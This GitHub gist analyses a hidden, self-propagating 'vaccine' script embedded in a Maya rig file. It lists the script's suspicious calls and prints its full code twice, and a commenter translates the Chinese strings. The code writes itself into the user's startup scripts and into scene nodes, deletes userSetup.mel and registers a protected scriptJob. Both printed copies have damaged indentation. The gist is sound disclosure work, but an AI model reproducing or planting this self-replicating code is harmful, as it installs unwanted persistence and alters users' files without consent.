Skip to content

Instantly share code, notes, and snippets.

@mottosso
Last active October 31, 2023 18:14
Show Gist options
  • Save mottosso/5d4f43a778e9b95d6dcd6a41bb7ae609 to your computer and use it in GitHub Desktop.
Save mottosso/5d4f43a778e9b95d6dcd6a41bb7ae609 to your computer and use it in GitHub Desktop.
Hidden scriptJob with "virus" and "vaccine" keywords from CG Monastery

This is a scene file from the CG Monastery Discord chat user @roly, containing an embedded script that auto-installs and calls itself on SceneSave. The script was found in the rig bat_rig_04.mb, rather than the animation file, TURN_ani_bat_23.ma. Find the imported scene file below (5340 kb).

What happens?

  • Installs itself on scene-open, as a cmds.scriptJob
  • Installs itself on Maya open, as ~/maya/scripts/vaccine.py
  • Warning on scene save with the following message

image

Suspicious words

  • virus
  • antivirus
  • vaccine

Suspicious calls

Calls that don't belong in any rig or animation file.

  • os.makedirs
  • os.remove
  • os.path.exists
  • shutil.copyfile
  • cmds.internalVar

Full Script Job

Obfuscated and hidden inside of the binary .mb file is this.

# coding=utf-8
# @Time    : 2020/07/05 15:46
# @Author  : \\xe9\\xa1\\xb6\\xe5\\xa4\\xa9\\xe7\\xab\\x8b\\xe5\\x9c\\xb0\\xe6\\x99\\xba\\xe6\\x85\\xa7\\xe5\\xa4\\xa7\\xe5\\xb0\\x86\\xe5\\x86\\x9b
# @File    : vaccine.py
# \\xe4\\xbb\\x85\\xe4\\xbd\\x9c\\xe4\\xb8\\xba\\xe5\\x85\\xac\\xe5\\x8f\\xb8\\xe5\\x86\\x85\\xe9\\x83\\xa8\\xe4\\xbd\\xbf\\xe7\\x94\\xa8\\xe4\\xbf\\x9d\\xe6\\x8a\\xa4 \\xe4\\xb8\\x80\\xe6\\x97\\xa6\\xe6\\xb3\\x84\\xe9\\x9c\\xb2\\xe5\\x87\\xba\\xe5\\x8e\\xbb\\xe9\\x80\\xa0\\xe6\\x88\\x90\\xe7\\x9a\\x84\\xe5\\xbd\\xb1\\xe5\\x93\\x8d \\xe6\\x9c\\xac\\xe4\\xba\\xba\\xe6\\xa6\\x82\\xe4\\xb8\\x8d\\xe8\\xb4\\x9f\\xe8\\xb4\\xa3
import maya.cmds as cmds
import os
import shutil


class phage:
    @staticmethod
    def backup(path):
        folder_path = path.rsplit('/', 1)[0]
        file_name = path.rsplit('/', 1)[-1].rsplit('.', 1)[0]
        backup_folder = folder_path + '/history'
        new_file = backup_folder + '/' + file_name + '_backup.ma '
        if not os.path.exists(backup_folder):
           os.makedirs(backup_folder)
       shutil.copyfile(path, new_file)

   def antivirus(self):
       health = True
       self.clone_gene()
       self.antivirus_virus_base()
        virus_gene = ['sysytenasdasdfsadfsdaf_dsfsdfaasd', 'PuTianTongQing', 'daxunhuan']
        all_script_jobs = cmds.scriptJob(listJobs=True)
       for each_job in all_script_jobs:
           for each_gene in virus_gene:
               if each_gene in each_job:
                   health = False
                   job_num = int(each_job.split(':', 1)[0])
                   cmds.scriptJob(kill=job_num, force=True)
        all_script = cmds.ls(type='script')
        if all_script:
           for each_script in all_script:
                commecnt = cmds.getAttr(each_script + '.before')
                for each_gene in virus_gene:
                   if commecnt:
                       if each_gene in commecnt:
                           try:
                               cmds.delete(each_script)
                           except:
                                name_space = each_script.rsplit(':',1)[0]
                                cmds.error(u'{}\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe6\\xb2\\xa1\\xe6\\xb3\\x95\\xe5\\x88\\xa0\\xe9\\x99\\xa4'.format(name_space))
        if not health:
           file_path = cmds.file(query=True, sceneName=True)
           self.backup(file_path)
           cmds.file(save=True)
           cmds.error(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xa2\\xab\\xe6\\x84\\x9f\\xe6\\x9f\\x93\\xe4\\xba\\x86\\xef\\xbc\\x8c\\xe4\\xbd\\x86\\xe6\\x98\\xaf\\xe6\\x88\\x91\\xe8\\xb4\\xb4\\xe5\\xbf\\x83\\xe7\\x9a\\x84\\xe4\\xb8\\xba\\xe6\\x82\\xa8\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xb9\\xb6\\xe4\\xb8\\x94\\xe5\\xa4\\x87\\xe4\\xbb\\xbd\\xe4\\xba\\x86~\\xe4\\xb8\\x8d\\xe7\\x94\\xa8\\xe8\\xb0\\xa2~')
        else:
            cmds.warning(u'\\xe4\\xbd\\xa0\\xe7\\x9a\\x84\\xe6\\x96\\x87\\xe4\\xbb\\xb6\\xe8\\xb4\\xbc\\xe5\\x81\\xa5\\xe5\\xba\\xb7~\\xe6\\x88\\x91\\xe5\\xb0\\xb1\\xe8\\xaf\\xb4\\xe4\\xb8\\x80\\xe5\\xa3\\xb0\\xe6\\xb2\\xa1\\xe6\\x9c\\x89\\xe5\\x88\\xab\\xe7\\x9a\\x84\\xe6\\x84\\x8f\\xe6\\x80\\x9d')

   @staticmethod
   def antivirus_virus_base():
        virus_base = cmds.internalVar(userAppDir=True) + '/scripts/userSetup.mel'
        if os.path.exists(virus_base):
           try:
               os.remove(virus_base)
           except:
                cmds.error(u'\\xe6\\x9d\\x80\\xe6\\xaf\\x92\\xe5\\xa4\\xb1\\xe8\\xb4\\xa5')

   def clone_gene(self):
        vaccine_path = cmds.internalVar(userAppDir=True) + '/scripts/vaccine.py'
        if not cmds.objExists('vaccine_gene'):
            if os.path.exists(vaccine_path):
               gene = list()
               with open(vaccine_path, "r") as f:
                   for line in f.readlines():
                       gene.append(line)
                npetri_dish_gene = """
import sys
import maya.cmds as cmds
maya_path = cmds.internalVar(userAppDir=True) + /scripts
if maya_path not in sys.path:
    sys.path.append(maya_path)

import vaccine
cmds.evalDeferred(leukocyte = vaccine.phage())
cmds.evalDeferred(leukocyte.occupation())

with open(petri_dish_path, "w") as f:
    f.writelines(petri_dish_gene)
"""

                cmds.scriptNode(st=1,
                                n='vaccine_gene', stp='python',
                                bs=bs)
                cmds.addAttr('vaccine_gene', ln="notes", sn="nts", dt="string")
                cmds.setAttr('vaccine_gene.notes', gene, type='string')
        if not cmds.objExists('breed_gene'):
            cmds.scriptNode(st=1,
                            n='breed_gene',
                            stp='python',
                            bs="""\
import os
vaccine_path = cmds.internalVar(userAppDir=True) + /scripts/vaccine.py
if not os.path.exists(vaccine_path):
    if cmds.objExists(vaccine_gene):
        gene = eval(cmds.getAttr(vaccine_gene.notes))
        with open(vaccine_path, "w") as f:
        f.writelines(gene)
""")

   def occupation(self):
       cmds.scriptJob(event=["SceneSaved", "leukocyte.antivirus()"], protected=True)
# coding=utf-8
# @Time : 2020/07/05 15:46
# @Author : 顶天立地智慧大将军
# @File : vaccine.py
# 仅作为公司内部使用保护 一旦泄露出去造成的影响 本人概不负责
import maya.cmds as cmds
import os
import shutil
class phage:
@staticmethod
def backup(path):
folder_path = path.rsplit('/', 1)[0]
file_name = path.rsplit('/', 1)[-1].rsplit('.', 1)[0]
backup_folder = folder_path + '/history'
new_file = backup_folder + '/' + file_name + '_backup.ma '
if not os.path.exists(backup_folder):
os.makedirs(backup_folder)
shutil.copyfile(path, new_file)
def antivirus(self):
health = True
self.clone_gene()
self.antivirus_virus_base()
virus_gene = ['sysytenasdasdfsadfsdaf_dsfsdfaasd', 'PuTianTongQing', 'daxunhuan']
all_script_jobs = cmds.scriptJob(listJobs=True)
for each_job in all_script_jobs:
for each_gene in virus_gene:
if each_gene in each_job:
health = False
job_num = int(each_job.split(':', 1)[0])
cmds.scriptJob(kill=job_num, force=True)
all_script = cmds.ls(type='script')
if all_script:
for each_script in all_script:
commecnt = cmds.getAttr(each_script + '.before')
for each_gene in virus_gene:
if commecnt:
if each_gene in commecnt:
try:
cmds.delete(each_script)
except:
name_space = each_script.rsplit(':',1)[0]
cmds.error(u'{}被感染了,但是我没法删除'.format(name_space))
if not health:
file_path = cmds.file(query=True, sceneName=True)
self.backup(file_path)
cmds.file(save=True)
cmds.error(u'你的文件被感染了,但是我贴心的为您杀毒并且备份了~不用谢~')
else:
cmds.warning(u'你的文件贼健康~我就说一声没有别的意思')
@staticmethod
def antivirus_virus_base():
virus_base = cmds.internalVar(userAppDir=True) + '/scripts/userSetup.mel'
if os.path.exists(virus_base):
try:
os.remove(virus_base)
except:
cmds.error(u'杀毒失败')
def clone_gene(self):
vaccine_path = cmds.internalVar(userAppDir=True) + '/scripts/vaccine.py'
if not cmds.objExists('vaccine_gene'):
if os.path.exists(vaccine_path):
gene = list()
with open(vaccine_path, "r") as f:
for line in f.readlines():
gene.append(line)
cmds.scriptNode(st=1,
bs="petri_dish_path = cmds.internalVar(userAppDir=True) + 'scripts/userSetup.py'\npetri_dish_gene = ['import sys\\r\\n', 'import maya.cmds as cmds\\r\\n', \"maya_path = cmds.internalVar(userAppDir=True) + '/scripts'\\r\\n\", 'if maya_path not in sys.path:\\r\\n', ' sys.path.append(maya_path)\\r\\n', 'import vaccine\\r\\n', \"cmds.evalDeferred('leukocyte = vaccine.phage()')\\r\\n\", \"cmds.evalDeferred('leukocyte.occupation()')\"]\nwith open(petri_dish_path, \"w\") as f:\n\tf.writelines(petri_dish_gene)",
n='vaccine_gene', stp='python')
cmds.addAttr('vaccine_gene', ln="notes", sn="nts", dt="string")
cmds.setAttr('vaccine_gene.notes', gene, type='string')
if not cmds.objExists('breed_gene'):
cmds.scriptNode(st=1,
bs="import os\nvaccine_path = cmds.internalVar(userAppDir=True) + '/scripts/vaccine.py'\nif not os.path.exists(vaccine_path):\n\tif cmds.objExists('vaccine_gene'):\n\t\tgene = eval(cmds.getAttr('vaccine_gene.notes'))\n\t\twith open(vaccine_path, \"w\") as f:\n\t\t\tf.writelines(gene)",
n='breed_gene', stp='python')
def occupation(self):
cmds.scriptJob(event=["SceneSaved", "leukocyte.antivirus()"], protected=True)
@binary1230
Copy link

binary1230 commented Oct 31, 2023

just came across this randomly, here's a few strings in that file translated into English.

Vaguely looks like self-propagating guerilla antivirus. Designed to remove certain malware from Maya installs, hilarious.

Author: "The indomitable and wise general"
"This is only for internal use of the company. I will not be responsible for the impact if it is leaked."

^ Hilarious. There must be a story behind this.

"Your file is infected, but I thoughtfully disinfected it and backed it up for you ~ You're welcome ~"
vs
"Your file is very healthy~ I just said it, I don’t mean anything else."
vs
"It's infected but I can't delete it"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment